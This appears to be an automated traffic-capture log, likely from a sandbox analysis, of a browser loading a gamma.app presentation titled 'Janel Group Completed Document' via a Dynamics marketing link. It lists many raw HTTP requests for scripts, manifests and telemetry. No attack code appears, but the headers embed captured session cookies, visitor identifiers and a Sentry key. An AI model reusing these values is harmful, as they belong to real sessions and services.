    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9989-f77016503ce7c2d8.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4055-15efd5d6b1df4e7d.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/docs/%5BdocId%5D-f58083b0fd70f2d6.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/KSZpz2RxLtBUY3-TtqqO6/_buildManifest.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/KSZpz2RxLtBUY3-TtqqO6/_ssgManifest.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /manifest.json HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicons/favicon-192.svg HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /favicons/favicon-192.svg HTTP/1.1Host: gamma.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100 HTTP/1.1Host: gamma.appConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "134.0.6998.36"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://public-usa.mkt.dynamics.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATawIf-None-Match: W/"40f6cf0388ef80e88d5bbb8db2b567a5"If-Modified-Since: Mon, 17 Mar 2025 22:01:34 GMT
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9680-e3c4e12efd5d6c79.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3641-46713cb4c5d1216e.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /api/5776661/envelope/?sentry_key=824b9acd00f449f283554475ff8303bb&sentry_version=7&sentry_client=sentry.javascript.nextjs%2F7.8.0 HTTP/1.1Host: o698378.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9015.3da411409f75d0c1.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9484.2d145ec231909a76.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7413e8b9.26789ad7eaab3ff4.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1743016e.cafbf12bf63073bf.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; _dd_s=logs=1&id=e7992cf0-e3e2-4291-be22-30f3dea0956a&created=1742299832803&expire=1742300732803
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/3d35b88c.89c8cbcdea31a14b.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; _dd_s=logs=1&id=e7992cf0-e3e2-4291-be22-30f3dea0956a&created=1742299832803&expire=1742300732803
    Source: global trafficHTTP traffic detected: GET /js/20579410255.js HTTP/1.1Host: cdn.optimizely.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/4483.b1e22900348e682f.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45 HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; _dd_s=logs=1&id=e7992cf0-e3e2-4291-be22-30f3dea0956a&created=1742299832803&expire=1742300732803
    Source: global trafficHTTP traffic detected: GET /js/app.js?appId=7blc4aqmp HTTP/1.1Host: assets.churnkey.coConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_app_static/js/tiktoken-640a99ed3ce5ba67.wasm HTTP/1.1Host: cdn.gamma.appConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://gamma.appSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /graphql HTTP/1.1Host: api.gamma.appConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://gamma.appSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2dSec-WebSocket-Key: 6kJ65g4J6iiigatI/3uW2Q==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: graphql-ws
